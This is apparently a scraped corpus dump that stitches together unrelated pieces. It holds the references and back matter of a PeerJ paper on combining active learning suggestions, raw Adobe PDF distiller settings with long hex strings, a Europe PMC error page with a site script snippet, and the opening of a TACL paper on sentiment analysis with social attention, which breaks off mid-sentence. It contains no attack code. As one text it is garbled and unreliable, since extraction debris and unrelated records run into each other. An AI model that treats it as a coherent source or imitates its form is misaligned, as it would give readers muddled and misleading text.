Carnegie Mellon University, University of Florida, the French Participation Group, the German Participation Group, Harvard University, the Instituto de Astrofisica de Canarias, the Michigan State/Notre Dame/JINA Participation Group, Johns Hopkins University, Lawrence Berkeley National Laboratory, Max Planck Institute for Astrophysics, Max Planck Institute for Extraterrestrial Physics, New Mexico State University, New York University, Ohio State University, Pennsylvania State University, University of Portsmouth, Princeton University, the Spanish Participation Group, University of Tokyo, University of Utah, Vanderbilt University, University of Virginia, University of Washington, and Yale University. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Australian Commonwealth Government’s Cooperative Research Centers Programme. Australian Research Council Centre of Excellence for All-sky Astrophysics (CAASTRO): CE110001020. Competing Interests The authors declare that they have no competing interests. Author Contributions � Alasdair Tran conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Cheng Soon Ong conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. � Christian Wolf authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The code of the experiments can be found at https://github.com/chengsoonong/mclass-sky. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 31/34 http://www.sdss3.org/ https://github.com/chengsoonong/mclass-sky http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ REFERENCES Alam S, Albareti FD, Prieto CA, Anders F, Anderson SF, Andrews BH, Armengaud E, Aubourg É, Bailey S, Bautista JE, Beaton RL, Beers TC, Bender CF, Berlind AA, Beutler F, Bhardwaj V, Bird JC, Bizyaev D, Blake CH, Blanton MR, Blomqvist M, Bochanski JJ, Bolton AS, Bovy J, Bradley AS, Brandt WN, Brauer DE, Brinkmann J, Brown PJ, Brownstein JR, Burden A, Burtin E, Busca NG, Cai Z, Capozzi D, Rosell AC, Carrera R, Chen Y, Chiappini C, Chojnowski SD, Chuang C, Clerc N, Comparat J, Covey K, Croft RAC, Cuesta AJ, Cunha K, da Costa LN, Rio ND, Davenport JRA, Dawson KS, Lee ND, Delubac T, Deshpande R, Dutra-Ferreira L, Dwelly T, Ealet A, Ebelke GL, Edmondson EM, Eisenstein DJ, Escoffier S, Esposito M, Fan X, Fernández-Alvar E, Feuillet D, Ak NF, Finley H, Finoguenov A, Flaherty K, Fleming SW, Font-Ribera A, Foster J, Frinchaboy PM, Galbraith-Frew JG, Garcı́a-Hernández DA, Pérez AEG, Gaulme P, Ge J, Génova-Santos R, Ghezzi L, Gillespie BA, Girardi L, Goddard D, Gontcho SGA, Hernández JIG, Grebel EK, Grieb JN, Grieves N, Gunn JE, Guo H, Harding P, Hasselquist S, Hawley SL, Hayden M, Hearty FR, Ho S, Hogg DW, Holley-Bockelmann K, Holtzman JA, Honscheid K, Huehnerhoff J, Jiang L, Johnson JA, Kinemuchi K, Kirkby D, Kitaura F, Klaene MA, Kneib J, Koenig XP, Lam CR, Lan T, Lang D, Laurent P, Goff JL, Leauthaud A, Lee K, Lee YS, Licquia TC, Liu J, Long DC, López-Corredoira M, Lorenzo-Oliveira D, Lucatello S, Lundgren B, Lupton RH, Mack CE III, Mahadevan S, Maia MAG, Majewski SR, Malanushenko E, Malanushenko V, Manchado A, Manera M, Mao Q, Maraston C, Marchwinski RC, Margala D, Martell SL, Martig M, Masters KL, McBride CK, McGehee PM, McGreer ID, McMahon RG, Ménard B, Menzel M, Merloni A, Mészáros S, Miller AA, Miralda-Escudé J, Miyatake H, Montero-Dorta AD, More S, Morice-Atkinson X, Morrison HL, Muna D, Myers AD, Newman JA, Neyrinck M, Nguyen DC, Nichol RC, Nidever DL, Noterdaeme P, Nuza SE, O’Connell JE, O’Connell RW, O’Connell R, Ogando RLC, Olmstead MD, Oravetz AE, Oravetz DJ, Osumi K, Owen R, Padgett DL, Padmanabhan N, Paegert M, Palanque-Delabrouille N, Pan K, Parejko JK, Park C, Pâris I, Pattarakijwanich P, Pellejero- Ibanez M, Pepper J, Percival WJ, Pérez-Fournon I, Pérez-Ràfols I, Petitjean P, Pieri MM, Pinsonneault MH, de Mello GFP, Prada F, Prakash A, Price-Whelan AM, Raddick MJ, Rahman M, Reid BA, Rich J, Rix H, Robin AC, Rockosi CM, Rodrigues TS, Rodrı́guez-Rottes S, Roe NA, Ross AJ, Ross NP, Rossi G, Ruan JJ, Rubiño-Martı́n JA, Rykoff ES, Salazar-Albornoz S, Salvato M, Samushia L, Sánchez AG, Santiago B, Sayres C, Schiavon RP, Schlegel DJ, Schmidt SJ, Schneider DP, Schultheis M, Schwope AD, Scóccola CG, Sellgren K, Seo H, Shane N, Shen Y, Shetrone M, Shu Y, Sivarani T, Skrutskie MF, Slosar A, Smith VV, Sobreira F, Stassun KG, Steinmetz M, Strauss MA, Streblyanska A, Swanson MEC, Tan JC, Tayar J, Terrien RC, Thakar AR, Thomas D, Thompson BA, Tinker JL, Tojeiro R, Troup NW, Vargas- Magaña M, Vazquez JA, Verde L, Viel M, Vogt NP, Wake DA, Wang J, Weaver BA, Weinberg DH, Weiner BJ, White M, Wilson JC, Wisniewski JP, Wood-Vasey WM, Yèche C, York DG, Zakamska NL, Zamora O, Zasowski G, Zehavi I, Zhao G, Zheng Z, Zhou X, Zhou Z, Zhu G, Zou H. 2015. The eleventh and twelfth data releases of the sloan digital sky survey: final data from SDSS-III. The Astrophysical Journal Supplement Series 219:12. Audibert J-Y, Munos R, Szepesvári C. 2009. Exploration–exploitation tradeoff using variance estimates in multi-armed bandits. Theoretical Computer Science 410(19):1876–1902 DOI 10.1016/j.tcs.2009.01.016. Auer P, Cesa-Bianchi N, Fischer P. 2002a. Finite-time analysis of the multiarmed bandit problem. Machine Learning 47(2–3):235–256. Auer P, Cesa-Bianchi N, Freund Y, Schapire RE. 2002b. The nonstochastic multiarmed bandit problem. SIAM Journal on Computing 32(1):48–77 DOI 10.1137/s0097539701398375. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 32/34 http://dx.doi.org/10.1016/j.tcs.2009.01.016 http://dx.doi.org/10.1137/s0097539701398375 http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Baram Y, El-Yaniv R, Luz K. 2004. Online choice of active learning algorithms. Journal of Machine Learning Research 5:255–291. Bedö J, Ong CS. 2016. Multivariate spearman’s ρ for aggregating ranks using copulas. Journal of Machine Learning Research 17(201):1–30. Berry DA, Fristedt B. 1985. Bandit Problems: Sequential Allocation of Experiments (Monographs on Statistics and Applied Probability). Vol. 5. London: Chapman and Hall, 71–87. Breiman L, Friedman J, Stone CJ, Olshen RA. 1984. Classification and Regression Trees. Boca Raton: CRC press. Brinker K. 2003. Incorporating diversity in active learning with support vector machines. In: Proceedings of the Twentieth International Conference on International Conference on Machine Learning, ICML’03. Palo Alto: AAAI Press, 59–66. Brodersen KH, Ong CS, Stephan KE, Buhmann JM. 2010. The balanced accuracy and its posterior distribution. In: Proceedings of the 2010 20th International Conference on Pattern Recognition, ICPR ‘10. Washington, D.C.: IEEE Computer Society, 3121–3124. Cappé O, Garivier A, Maillard O-A, Munos R, Stoltz G. 2013. Kullback-leibler upper confidence bounds for optimal sequential allocation. Annals of Statistics 41(3):1516–1541 DOI 10.1214/13-aos1119. Culotta A, McCallum A. 2005. Reducing labeling effort for structured prediction tasks. In: Proceedings of the 20th National Conference on Artificial Intelligence–Volume 2, AAAI’05. Palo Alto: AAAI Press, 746–751. Freund Y, Schapire RE. 1996. Experiments with a new boosting algorithm. In: Proceedings of the Thirteenth International Conference on International Conference on Machine Learning, ICML’96. San Francisco: Morgan Kaufmann Publishers Inc., 148–156. Freund Y, Seung HS, Shamir E, Tishby N. 1997. Selective sampling using the query by committee algorithm. Machine Learning 28(2–3):133–168. Hsu W-N, Lin H-T. 2015. Active learning by learning. In: AAAI. Palo Alto: AAAI Press, 2659–2665. Lattimore T. 2015. Optimally confident UCB: improved regret for finite-armed bandits. CoRR. Available at http://arxiv.org/abs/1507.07880. Lewis DD, Gale WA. 1994. A sequential algorithm for training text classifiers. In: Proceedings of the 17th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval. New York: Springer-Verlag, 3–12. Lichman M. 2013. UCI machine learning repository. Available at http://archive.ics.uci.edu/ml. List C. Social choice theory. Available at https://plato.stanford.edu/entries/social-choice/. McCallum A, Nigam K. 1998. Employing EM and pool-based active learning for text classification. In: Proceedings of the Fifteenth International Conference on Machine Learning, ICML ‘98. San Francisco: Morgan Kaufmann Publishers Inc., 350–358. Melville P, Mooney RJ. 2004. Diverse ensembles for active learning. In: Proceedings of the Twenty- First International Conference on Machine Learning. New York: ACM, 74. Pedregosa F, Varoquaux G, Gramfort A, Michel V, Thirion B, Grisel O, Blondel M, Prettenhofer P, Weiss R, Dubourg V, Vanderplas J, Passos A, Cournapeau D, Brucher M, Perrot M, Duchesnay E. 2011. Scikit-learn: machine learning in Python. Journal of Machine Learning Research 12:2825–2830. Rahimi A, Recht B. 2008. Random features for large-scale kernel machines. Advances in Neural Information Processing Systems. USA: Curran Associates Inc., 1177–1184. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 33/34 http://dx.doi.org/10.1214/13-aos1119 http://arxiv.org/abs/1507.07880 http://archive.ics.uci.edu/ml https://plato.stanford.edu/entries/social-choice/ http://dx.doi.org/10.7717/peerj-cs.157 https://peerj.com/computer-science/ Reichart R, Tomanek K, Hahn U, Rappoport A. 2008. Multi-task active learning for linguistic annotations. In: Proceedings of ACL-08: HLT. Stroudsburg: Association for Computational Linguistics, 861–869. Reyes O, Morell C, Ventura S. 2018. Effective active learning strategy for multi-label learning. Neurocomputing 273:494–508 DOI 10.1016/j.neucom.2017.08.001. Reyes O, Ventura S. 2018. Evolutionary strategy to perform batch-mode active learning on multi- label data. ACM Transactions on Intelligent Systems and Technology 9(4):46:146:26 DOI 10.1145/3161606. Scheffer T, Decomain C, Wrobel S. 2001. Active hidden markov models for information extraction. In: Advances in Intelligent Data Analysis. Vol. 2189. Berlin/Heidelberg: Springer, 309–318. Schein AI, Ungar LH. 2007. Active learning for logistic regression: an evaluation. Machine Learning 68(3):235–265 DOI 10.1007/s10994-007-5019-5. Schulze M. 2011. A new monotonic, clone-independent, reversal symmetric, and condorcet- consistent single-winner election method. Social Choice and Welfare 36(2):267–303 DOI 10.1007/s00355-010-0475-4. Seldin Y, Slivkins A. 2014. One practical algorithm for both stochastic and adversarial bandits. In: Proceedings of the 31st International Conference on Machine Learning. Bejing: PMLR, 1287–1295. Settles B. 2012. Active learning. Synthesis Lectures on Artificial Intelligence and Machine Learning 6(1):1–114. Settles B, Craven M. 2008. An analysis of active learning strategies for sequence labeling tasks. In: Proceedings of the Conference on Empirical Methods in Natural Language Processing. Stroudsburg: Association for Computational Linguistics, 1070–1079. Shannon CE. 1948. A mathematical theory of communication. Bell System Technical Journal 27(3):379–423. Thompson WR. 1933. On the likelihood that one unknown probability exceeds another in view of the evidence of two samples. Biometrika 25(3–4):285–294 DOI 10.1093/biomet/25.3-4.285. Tran A. 2015. Photometric classification with thompson sampling. Available at https://github.com/ chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran15honours-thesis.pdf. Xu Z, Akella R, Zhang Y. 2007. Incorporating diversity and density in active learning for relevance feedback. In: European Conference on Information Retrieval. Berlin/Heidelberg: Springer, 246–257. Tran et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.157 34/34 http://dx.doi.org/10.1016/j.neucom.2017.08.001 http://dx.doi.org/10.1145/3161606 http://dx.doi.org/10.1007/s10994-007-5019-5 http://dx.doi.org/10.1007/s00355-010-0475-4 http://dx.doi.org/10.1093/biomet/25.3-4.285 https://github.com/chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran15honours-thesis.pdf https://github.com/chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran15honours-thesis.pdf https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.157 Combining active learning suggestions Introduction Overview of Active Learning Combining Suggestions Experimental Protocol Results Discussion Conclusion Appendix a: Posterior Balanced Accuracy References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_n4o7bftya5ej7jassfu3b5i6zi ---- wp-p1m-39.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-39.ebi.ac.uk no 265368419 Params is empty 265368419 exception Params is empty 2021/04/06-17:58:18 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265368419 (wp-p1m-39.ebi.ac.uk) Time: 2021/04/06 17:58:18 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_n4uw6vwblfdcpfokkebmfw6sxe ---- Overcoming Language Variation in Sentiment Analysis with Social Attention Yi Yang and Jacob Eisenstein School of Interactive Computing Georgia Institute of Technology Atlanta, GA 30308 {yiyang+jacobe}@gatech.edu Abstract Variation in language is ubiquitous, particu- larly in newer forms of writing such as social media. Fortunately, variation is not random; it is often linked to social properties of the au- thor. In this paper, we show how to exploit social networks to make sentiment analysis more robust to social language variation. The key idea is linguistic homophily: the tendency of socially linked individuals to use language in similar ways. We formalize this idea in a novel attention-based neural network architec- ture, in which attention is divided among sev- eral basis models, depending on the author’s position in the social network. This has the effect of smoothing the classification function across the social network, and makes it pos- sible to induce personalized classifiers even for authors for whom there is no labeled data or demographic metadata. This model signif- icantly improves the accuracies of sentiment analysis on Twitter and on review data. 1 Introduction Words can mean different things to different people. Fortunately, these differences are rarely idiosyn- cratic, but are often linked to social factors, such as age (Rosenthal and McKeown, 2011), gender (Eck- ert and McConnell-Ginet, 2003), race (Green, 2002), geography (Trudgill, 1974), and more inef- fable characteristics such as political and cultural attitudes (Fischer, 1958; Labov, 1963). In natural language processing (NLP), social media data has brought variation to the fore, spurring the develop- ment of new computational techniques for charac- terizing variation in the lexicon (Eisenstein et al., 2010), orthography (Eisenstein, 2015), and syn- tax (Blodgett et al., 2016). However, aside from the focused task of spelling normalization (Sproat et al., 2001; Aw et al., 2006), there have been few attempts to make NLP systems more robust to language vari- ation across speakers or writers. One exception is the work of Hovy (2015), who shows that the accuracies of sentiment analysis and topic classification can be improved by the inclusion of coarse-grained author demographics such as age and gender. However, such demographic informa- tion is not directly available in most datasets, and it is not yet clear whether predicted age and gen- der offer any improvements. On the other end of the spectrum are attempts to create personalized lan- guage technologies, as are often employed in infor- mation retrieval (Shen et al., 2005), recommender systems (Basilico and Hofmann, 2004), and lan- guage modeling (Federico, 1996). But personal- ization requires annotated data for each individual user—something that may be possible in interactive settings such as information retrieval, but is not typ- ically feasible in natural language processing. We propose a middle ground between group-level demographic characteristics and personalization, by exploiting social network structure. The sociologi- cal theory of homophily asserts that individuals are usually similar to their friends (McPherson et al., 2001). This property has been demonstrated for lan- guage (Bryden et al., 2013) as well as for the demo- graphic properties targeted by Hovy (2015), which are more likely to be shared by friends than by ran- dom pairs of individuals (Thelwall, 2009). Social 295 Transactions of the Association for Computational Linguistics, vol. 5, pp. 295–307, 2017. Action Editor: Christopher Potts. Submission batch: 10/2016; Revision batch: 12/2016; Published 8/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Figure 1: Words such as ‘sick’ can express opposite sen- timent polarities depending on the author. We account for this variation by generalizing across the social network. network information is available in a wide range of contexts, from social media (Huberman et al., 2008) to political speech (Thomas et al., 2006) to histori- cal texts (Winterer, 2012). Thus, social network ho- mophily has the potential to provide a more general way to account for linguistic variation in NLP. Figure 1 gives a schematic of the motivation for our approach. The word ‘sick’ typically has a nega- tive sentiment, e.g., ‘I would like to believe he’s sick rather than just mean and evil.’1 However, in some communities the word can have a positive sentiment, e.g., the lyric ‘this sick beat’, recently trademarked by the musician Taylor Swift.2 Given labeled ex- amples of ‘sick’ in use by individuals in a social network, we assume that the word will have a simi- lar sentiment meaning for their near neighbors—an assumption of linguistic 